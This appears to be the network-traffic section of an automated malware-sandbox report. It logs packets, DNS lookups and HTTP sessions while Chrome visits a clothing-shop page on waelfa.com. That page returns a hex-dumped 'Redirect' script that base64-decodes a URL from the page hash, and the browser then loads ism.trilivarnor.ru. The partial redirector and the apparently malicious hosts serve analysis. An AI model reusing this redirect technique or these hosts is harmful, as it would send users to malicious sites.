                      Jan 14, 2025 14:36:47.121108055 CET44349747172.67.179.163192.168.2.4
                      Jan 14, 2025 14:36:47.121149063 CET49747443192.168.2.4172.67.179.163
                      Jan 14, 2025 14:36:47.121156931 CET44349747172.67.179.163192.168.2.4
                      Jan 14, 2025 14:36:47.121186018 CET49747443192.168.2.4172.67.179.163
                      Jan 14, 2025 14:36:47.121417046 CET44349747172.67.179.163192.168.2.4
                      Jan 14, 2025 14:36:47.121433973 CET44349747172.67.179.163192.168.2.4
                      Jan 14, 2025 14:36:47.121476889 CET49747443192.168.2.4172.67.179.163
                      Jan 14, 2025 14:36:47.121484995 CET44349747172.67.179.163192.168.2.4
                      Jan 14, 2025 14:36:47.121512890 CET49747443192.168.2.4172.67.179.163
                      Jan 14, 2025 14:36:47.122148037 CET44349747172.67.179.163192.168.2.4
                      Jan 14, 2025 14:36:47.122221947 CET49747443192.168.2.4172.67.179.163
                      Jan 14, 2025 14:36:47.122229099 CET44349747172.67.179.163192.168.2.4
                      Jan 14, 2025 14:36:47.122267962 CET44349747172.67.179.163192.168.2.4
                      Jan 14, 2025 14:36:47.122277975 CET49747443192.168.2.4172.67.179.163
                      Jan 14, 2025 14:36:47.122313023 CET49747443192.168.2.4172.67.179.163
                      Jan 14, 2025 14:36:47.122864962 CET49747443192.168.2.4172.67.179.163
                      Jan 14, 2025 14:36:47.122883081 CET44349747172.67.179.163192.168.2.4
                      Jan 14, 2025 14:36:47.140189886 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.140247107 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.140314102 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.140494108 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.140506029 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.594501972 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.594949007 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.594966888 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.595952034 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.596028090 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.597093105 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.597158909 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.597364902 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.597373962 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.640475035 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.693876982 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.693943977 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.693974018 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.694000959 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.694030046 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.694122076 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.694122076 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.694134951 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.694176912 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.694549084 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.694593906 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.694619894 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.694628000 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.694633007 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.694669008 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.694673061 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.708323956 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.708425045 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.708434105 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.754517078 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.868864059 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.868921995 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.868952990 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.868984938 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.869010925 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.869039059 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.869067907 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.869103909 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.869132042 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.869142056 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.869142056 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.869142056 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.869163990 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.869177103 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.869198084 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.869232893 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.869237900 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.869242907 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.869283915 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.869316101 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.869322062 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.869327068 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.869333982 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.869364977 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.869369984 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.869374037 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.869407892 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.869412899 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.869441032 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.869472027 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.869482040 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.869487047 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.869524002 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.869528055 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.869532108 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.869570971 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.869575977 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.873749971 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.873791933 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.873838902 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.873847008 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.873891115 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.873894930 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.873924971 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.873955965 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.873984098 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.873984098 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.873995066 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.874023914 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.874927044 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.874994040 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.874999046 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.875910044 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.875958920 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.876000881 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.876013994 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.876028061 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.876053095 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.876760006 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.876859903 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.876935959 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.876935959 CET49749443192.168.2.4151.101.2.137
                      Jan 14, 2025 14:36:47.876945972 CET44349749151.101.2.137192.168.2.4
                      Jan 14, 2025 14:36:47.973320007 CET49748443192.168.2.4172.67.179.163
                      Jan 14, 2025 14:36:48.015333891 CET44349748172.67.179.163192.168.2.4
                      Jan 14, 2025 14:36:48.562920094 CET44349748172.67.179.163192.168.2.4
                      Jan 14, 2025 14:36:48.563002110 CET44349748172.67.179.163192.168.2.4
                      Jan 14, 2025 14:36:48.563097954 CET49748443192.168.2.4172.67.179.163
                      Jan 14, 2025 14:36:48.564734936 CET49748443192.168.2.4172.67.179.163
                      Jan 14, 2025 14:36:48.564752102 CET44349748172.67.179.163192.168.2.4
                      Jan 14, 2025 14:36:48.573774099 CET49751443192.168.2.435.190.80.1
                      Jan 14, 2025 14:36:48.573829889 CET4434975135.190.80.1192.168.2.4
                      Jan 14, 2025 14:36:48.573911905 CET49751443192.168.2.435.190.80.1
                      Jan 14, 2025 14:36:48.574171066 CET49751443192.168.2.435.190.80.1
                      Jan 14, 2025 14:36:48.574187040 CET4434975135.190.80.1192.168.2.4
                      Jan 14, 2025 14:36:49.052762985 CET4434975135.190.80.1192.168.2.4
                      Jan 14, 2025 14:36:49.053308964 CET49751443192.168.2.435.190.80.1
                      Jan 14, 2025 14:36:49.053334951 CET4434975135.190.80.1192.168.2.4
                      Jan 14, 2025 14:36:49.054264069 CET4434975135.190.80.1192.168.2.4
                      Jan 14, 2025 14:36:49.054404974 CET49751443192.168.2.435.190.80.1
                      Jan 14, 2025 14:36:49.055335999 CET49751443192.168.2.435.190.80.1
                      Jan 14, 2025 14:36:49.055419922 CET4434975135.190.80.1192.168.2.4
                      Jan 14, 2025 14:36:49.055555105 CET49751443192.168.2.435.190.80.1
                      Jan 14, 2025 14:36:49.055566072 CET4434975135.190.80.1192.168.2.4
                      Jan 14, 2025 14:36:49.107331991 CET49751443192.168.2.435.190.80.1
                      Jan 14, 2025 14:36:49.181756020 CET4434975135.190.80.1192.168.2.4
                      Jan 14, 2025 14:36:49.181823015 CET4434975135.190.80.1192.168.2.4
                      Jan 14, 2025 14:36:49.182003021 CET49751443192.168.2.435.190.80.1
                      Jan 14, 2025 14:36:49.182411909 CET49751443192.168.2.435.190.80.1
                      Jan 14, 2025 14:36:49.182435036 CET4434975135.190.80.1192.168.2.4
                      Jan 14, 2025 14:36:49.182796001 CET49752443192.168.2.435.190.80.1
                      Jan 14, 2025 14:36:49.182841063 CET4434975235.190.80.1192.168.2.4
                      Jan 14, 2025 14:36:49.182904005 CET49752443192.168.2.435.190.80.1
                      Jan 14, 2025 14:36:49.183093071 CET49752443192.168.2.435.190.80.1
                      Jan 14, 2025 14:36:49.183109045 CET4434975235.190.80.1192.168.2.4
                      Jan 14, 2025 14:36:49.636992931 CET4434975235.190.80.1192.168.2.4
                      Jan 14, 2025 14:36:49.637293100 CET49752443192.168.2.435.190.80.1
                      Jan 14, 2025 14:36:49.637324095 CET4434975235.190.80.1192.168.2.4
                      Jan 14, 2025 14:36:49.637679100 CET4434975235.190.80.1192.168.2.4
                      Jan 14, 2025 14:36:49.638052940 CET49752443192.168.2.435.190.80.1
                      Jan 14, 2025 14:36:49.638119936 CET4434975235.190.80.1192.168.2.4
                      Jan 14, 2025 14:36:49.638303041 CET49752443192.168.2.435.190.80.1
                      Jan 14, 2025 14:36:49.679342031 CET4434975235.190.80.1192.168.2.4
                      Jan 14, 2025 14:36:49.766386032 CET4434975235.190.80.1192.168.2.4
                      Jan 14, 2025 14:36:49.766468048 CET4434975235.190.80.1192.168.2.4
                      Jan 14, 2025 14:36:49.766525030 CET49752443192.168.2.435.190.80.1
                      Jan 14, 2025 14:36:49.766722918 CET49752443192.168.2.435.190.80.1
                      Jan 14, 2025 14:36:49.766746998 CET4434975235.190.80.1192.168.2.4
                      Jan 14, 2025 14:36:51.196721077 CET44349738216.58.206.36192.168.2.4
                      Jan 14, 2025 14:36:51.196791887 CET44349738216.58.206.36192.168.2.4
                      Jan 14, 2025 14:36:51.196904898 CET49738443192.168.2.4216.58.206.36
                      Jan 14, 2025 14:36:51.217749119 CET49738443192.168.2.4216.58.206.36
                      Jan 14, 2025 14:36:51.217781067 CET44349738216.58.206.36192.168.2.4
                      Jan 14, 2025 14:36:53.300215006 CET4972380192.168.2.4199.232.214.172
                      Jan 14, 2025 14:36:53.305526018 CET8049723199.232.214.172192.168.2.4
                      Jan 14, 2025 14:36:53.306189060 CET4972380192.168.2.4199.232.214.172
                      Jan 14, 2025 14:36:58.099735022 CET5728053192.168.2.41.1.1.1
                      Jan 14, 2025 14:36:58.104635954 CET53572801.1.1.1192.168.2.4
                      Jan 14, 2025 14:36:58.104717016 CET5728053192.168.2.41.1.1.1
                      Jan 14, 2025 14:36:58.104744911 CET5728053192.168.2.41.1.1.1
                      Jan 14, 2025 14:36:58.109476089 CET53572801.1.1.1192.168.2.4
                      Jan 14, 2025 14:36:58.562836885 CET53572801.1.1.1192.168.2.4
                      Jan 14, 2025 14:36:58.569792032 CET5728053192.168.2.41.1.1.1
                      Jan 14, 2025 14:36:58.575495958 CET53572801.1.1.1192.168.2.4
                      Jan 14, 2025 14:36:58.575577974 CET5728053192.168.2.41.1.1.1
                      Jan 14, 2025 14:37:40.702091932 CET57349443192.168.2.4216.58.206.36
                      Jan 14, 2025 14:37:40.702128887 CET44357349216.58.206.36192.168.2.4
                      Jan 14, 2025 14:37:40.702222109 CET57349443192.168.2.4216.58.206.36
                      Jan 14, 2025 14:37:40.702548981 CET57349443192.168.2.4216.58.206.36
                      Jan 14, 2025 14:37:40.702560902 CET44357349216.58.206.36192.168.2.4
                      Jan 14, 2025 14:37:41.355214119 CET44357349216.58.206.36192.168.2.4
                      Jan 14, 2025 14:37:41.357072115 CET57349443192.168.2.4216.58.206.36
                      Jan 14, 2025 14:37:41.357103109 CET44357349216.58.206.36192.168.2.4
                      Jan 14, 2025 14:37:41.357562065 CET44357349216.58.206.36192.168.2.4
                      Jan 14, 2025 14:37:41.359786034 CET57349443192.168.2.4216.58.206.36
                      Jan 14, 2025 14:37:41.359915972 CET44357349216.58.206.36192.168.2.4
                      Jan 14, 2025 14:37:41.403784990 CET57349443192.168.2.4216.58.206.36
                      Jan 14, 2025 14:37:42.685309887 CET4972480192.168.2.4199.232.214.172
                      Jan 14, 2025 14:37:42.692234039 CET8049724199.232.214.172192.168.2.4
                      Jan 14, 2025 14:37:42.692373037 CET4972480192.168.2.4199.232.214.172
                      Jan 14, 2025 14:37:51.257694006 CET44357349216.58.206.36192.168.2.4
                      Jan 14, 2025 14:37:51.257759094 CET44357349216.58.206.36192.168.2.4
                      Jan 14, 2025 14:37:51.257868052 CET57349443192.168.2.4216.58.206.36
                      Jan 14, 2025 14:37:53.218981981 CET57349443192.168.2.4216.58.206.36
                      Jan 14, 2025 14:37:53.219017982 CET44357349216.58.206.36192.168.2.4
                      TimestampSource PortDest PortSource IPDest IP
                      Jan 14, 2025 14:36:36.776968956 CET53630901.1.1.1192.168.2.4
                      Jan 14, 2025 14:36:36.970784903 CET53626871.1.1.1192.168.2.4
                      Jan 14, 2025 14:36:37.974390984 CET53493761.1.1.1192.168.2.4
                      Jan 14, 2025 14:36:40.639106989 CET5646953192.168.2.41.1.1.1
                      Jan 14, 2025 14:36:40.639293909 CET6508653192.168.2.41.1.1.1
                      Jan 14, 2025 14:36:40.645869970 CET53650861.1.1.1192.168.2.4
                      Jan 14, 2025 14:36:40.645920992 CET53564691.1.1.1192.168.2.4
                      Jan 14, 2025 14:36:43.565529108 CET4925953192.168.2.41.1.1.1
                      Jan 14, 2025 14:36:43.565701008 CET6226153192.168.2.41.1.1.1
                      Jan 14, 2025 14:36:43.581463099 CET53492591.1.1.1192.168.2.4
                      Jan 14, 2025 14:36:43.582654953 CET53622611.1.1.1192.168.2.4
                      Jan 14, 2025 14:36:44.991556883 CET4987753192.168.2.41.1.1.1
                      Jan 14, 2025 14:36:44.991828918 CET5286653192.168.2.41.1.1.1
                      Jan 14, 2025 14:36:45.057846069 CET53528661.1.1.1192.168.2.4
                      Jan 14, 2025 14:36:45.125747919 CET53498771.1.1.1192.168.2.4
                      Jan 14, 2025 14:36:47.132730961 CET6395253192.168.2.41.1.1.1
                      Jan 14, 2025 14:36:47.132916927 CET5728953192.168.2.41.1.1.1
                      Jan 14, 2025 14:36:47.139525890 CET53639521.1.1.1192.168.2.4
                      Jan 14, 2025 14:36:47.139802933 CET53572891.1.1.1192.168.2.4
                      Jan 14, 2025 14:36:47.979921103 CET53649751.1.1.1192.168.2.4
                      Jan 14, 2025 14:36:48.564246893 CET5877353192.168.2.41.1.1.1
                      Jan 14, 2025 14:36:48.564412117 CET5679753192.168.2.41.1.1.1
                      Jan 14, 2025 14:36:48.572653055 CET53567971.1.1.1192.168.2.4
                      Jan 14, 2025 14:36:48.572669983 CET53587731.1.1.1192.168.2.4
                      Jan 14, 2025 14:36:54.238795042 CET138138192.168.2.4192.168.2.255
                      Jan 14, 2025 14:36:55.054670095 CET53554371.1.1.1192.168.2.4
                      Jan 14, 2025 14:36:58.099303961 CET53583851.1.1.1192.168.2.4
                      Jan 14, 2025 14:37:36.430078030 CET53532831.1.1.1192.168.2.4
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Jan 14, 2025 14:36:40.639106989 CET192.168.2.41.1.1.10xbaf2Standard query (0)www.google.comA (IP address)IN (0x0001)false
                      Jan 14, 2025 14:36:40.639293909 CET192.168.2.41.1.1.10xb1adStandard query (0)www.google.com65IN (0x0001)false
                      Jan 14, 2025 14:36:43.565529108 CET192.168.2.41.1.1.10x974fStandard query (0)waelfa.comA (IP address)IN (0x0001)false
                      Jan 14, 2025 14:36:43.565701008 CET192.168.2.41.1.1.10x4fefStandard query (0)waelfa.com65IN (0x0001)false
                      Jan 14, 2025 14:36:44.991556883 CET192.168.2.41.1.1.10x9e75Standard query (0)ism.trilivarnor.ruA (IP address)IN (0x0001)false
                      Jan 14, 2025 14:36:44.991828918 CET192.168.2.41.1.1.10x4357Standard query (0)ism.trilivarnor.ru65IN (0x0001)false
                      Jan 14, 2025 14:36:47.132730961 CET192.168.2.41.1.1.10x6a97Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                      Jan 14, 2025 14:36:47.132916927 CET192.168.2.41.1.1.10x8264Standard query (0)code.jquery.com65IN (0x0001)false
                      Jan 14, 2025 14:36:48.564246893 CET192.168.2.41.1.1.10x6f8cStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                      Jan 14, 2025 14:36:48.564412117 CET192.168.2.41.1.1.10x3034Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jan 14, 2025 14:36:40.645869970 CET1.1.1.1192.168.2.40xb1adNo error (0)www.google.com65IN (0x0001)false
                      Jan 14, 2025 14:36:40.645920992 CET1.1.1.1192.168.2.40xbaf2No error (0)www.google.com216.58.206.36A (IP address)IN (0x0001)false
                      Jan 14, 2025 14:36:43.581463099 CET1.1.1.1192.168.2.40x974fNo error (0)waelfa.com104.21.64.1A (IP address)IN (0x0001)false
                      Jan 14, 2025 14:36:43.581463099 CET1.1.1.1192.168.2.40x974fNo error (0)waelfa.com104.21.48.1A (IP address)IN (0x0001)false
                      Jan 14, 2025 14:36:43.581463099 CET1.1.1.1192.168.2.40x974fNo error (0)waelfa.com104.21.96.1A (IP address)IN (0x0001)false
                      Jan 14, 2025 14:36:43.581463099 CET1.1.1.1192.168.2.40x974fNo error (0)waelfa.com104.21.32.1A (IP address)IN (0x0001)false
                      Jan 14, 2025 14:36:43.581463099 CET1.1.1.1192.168.2.40x974fNo error (0)waelfa.com104.21.80.1A (IP address)IN (0x0001)false
                      Jan 14, 2025 14:36:43.581463099 CET1.1.1.1192.168.2.40x974fNo error (0)waelfa.com104.21.112.1A (IP address)IN (0x0001)false
                      Jan 14, 2025 14:36:43.581463099 CET1.1.1.1192.168.2.40x974fNo error (0)waelfa.com104.21.16.1A (IP address)IN (0x0001)false
                      Jan 14, 2025 14:36:43.582654953 CET1.1.1.1192.168.2.40x4fefNo error (0)waelfa.com65IN (0x0001)false
                      Jan 14, 2025 14:36:45.057846069 CET1.1.1.1192.168.2.40x4357No error (0)ism.trilivarnor.ru65IN (0x0001)false
                      Jan 14, 2025 14:36:45.125747919 CET1.1.1.1192.168.2.40x9e75No error (0)ism.trilivarnor.ru172.67.179.163A (IP address)IN (0x0001)false
                      Jan 14, 2025 14:36:45.125747919 CET1.1.1.1192.168.2.40x9e75No error (0)ism.trilivarnor.ru104.21.18.22A (IP address)IN (0x0001)false
                      Jan 14, 2025 14:36:47.139525890 CET1.1.1.1192.168.2.40x6a97No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                      Jan 14, 2025 14:36:47.139525890 CET1.1.1.1192.168.2.40x6a97No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                      Jan 14, 2025 14:36:47.139525890 CET1.1.1.1192.168.2.40x6a97No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                      Jan 14, 2025 14:36:47.139525890 CET1.1.1.1192.168.2.40x6a97No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                      Jan 14, 2025 14:36:48.572669983 CET1.1.1.1192.168.2.40x6f8cNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                      • waelfa.com
                      • https:
                        • ism.trilivarnor.ru
                        • code.jquery.com
                      • a.nel.cloudflare.com
                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.449744104.21.64.14432696C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 13:36:44 UTC686OUTGET /product-category/women/ensembles/ HTTP/1.1
                      Host: waelfa.com
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-14 13:36:44 UTC786INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 13:36:44 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      cf-cache-status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q3IjcfxavlWtJXJwOJSmJhKc4T%2BC1qL8WyVtvRq7GQW6U%2F6zLPGvYbDjKlOvnIutaVRJ%2B1yJaASKi%2FbW64margQVKMfzea%2BmB92La5%2BYNKTMvfxtjSzPv%2FTrEOQm"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 901e0446f8e5c358-EWR
                      alt-svc: h3=":443"; ma=86400
                      server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1656&rtt_var=631&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1264&delivery_rate=1719670&cwnd=155&unsent_bytes=0&cid=c197753c3bc913d8&ts=336&x=0"
                      2025-01-14 13:36:44 UTC583INData Raw: 34 31 35 0d 0a 3c 73 63 72 69 70 74 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 3e 0a 66 75 6e 63 74 69 6f 6e 20 62 61 73 65 36 34 44 65 63 6f 64 65 55 72 6c 28 73 74 72 29 7b 0a 20 20 20 20 72 65 74 75 72 6e 20 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 74 6f 62 28 73 74 72 29 2e 73 70 6c 69 74 28 27 27 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 63 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 27 25 27 20 2b 20 28 27 30 30 27 20 2b 20 63 2e 63 68 61 72 43 6f 64 65 41 74
                      Data Ascii: 415<scriptlanguage="javascript"><html lang="en"><head><meta charset="UTF-8"><title>Redirect</title><script>function base64DecodeUrl(str){ return decodeURIComponent(atob(str).split('').map(function(c) { return '%' + ('00' + c.charCodeAt
                      2025-01-14 13:36:44 UTC469INData Raw: 2e 69 6e 63 6c 75 64 65 73 28 27 2f 27 29 29 20 7b 0a 20 20 20 20 20 20 20 20 75 72 6c 20 3d 20 62 61 73 65 36 34 44 65 63 6f 64 65 55 72 6c 28 68 61 73 68 2e 73 70 6c 69 74 28 27 2f 27 29 5b 30 5d 29 2b 68 61 73 68 2e 73 70 6c 69 74 28 27 2f 27 29 5b 31 5d 3b 20 2f 2f 20 49 66 20 6e 6f 74 2c 20 74 72 79 20 74 6f 20 62 61 73 65 36 34 20 64 65 63 6f 64 65 20 69 74 0a 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 75 72 6c 20 3d 20 62 61 73 65 36 34 44 65 63 6f 64 65 55 72 6c 28 68 61 73 68 29 3b 20 2f 2f 20 49 66 20 6e 6f 74 2c 20 74 72 79 20 74 6f 20 62 61 73 65 36 34 20 64 65 63 6f 64 65 20 69 74 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 0a 20 20 20 20 69 66 20 28 75 72 6c 20 26 26 20 2f 5e 28 68 74 74 70 73 3f 3a 5c
                      Data Ascii: .includes('/')) { url = base64DecodeUrl(hash.split('/')[0])+hash.split('/')[1]; // If not, try to base64 decode it } else { url = base64DecodeUrl(hash); // If not, try to base64 decode it } } if (url && /^(https?:\
                      2025-01-14 13:36:44 UTC5INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.449747172.67.179.1634432696C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 13:36:46 UTC686OUTGET /NiKU3ISg/ HTTP/1.1
                      Host: ism.trilivarnor.ru
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-Dest: document
                      Referer: https://waelfa.com/
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-14 13:36:46 UTC1242INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 13:36:46 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Cache-Control: no-cache, private
                      cf-cache-status: DYNAMIC
                      vary: accept-encoding
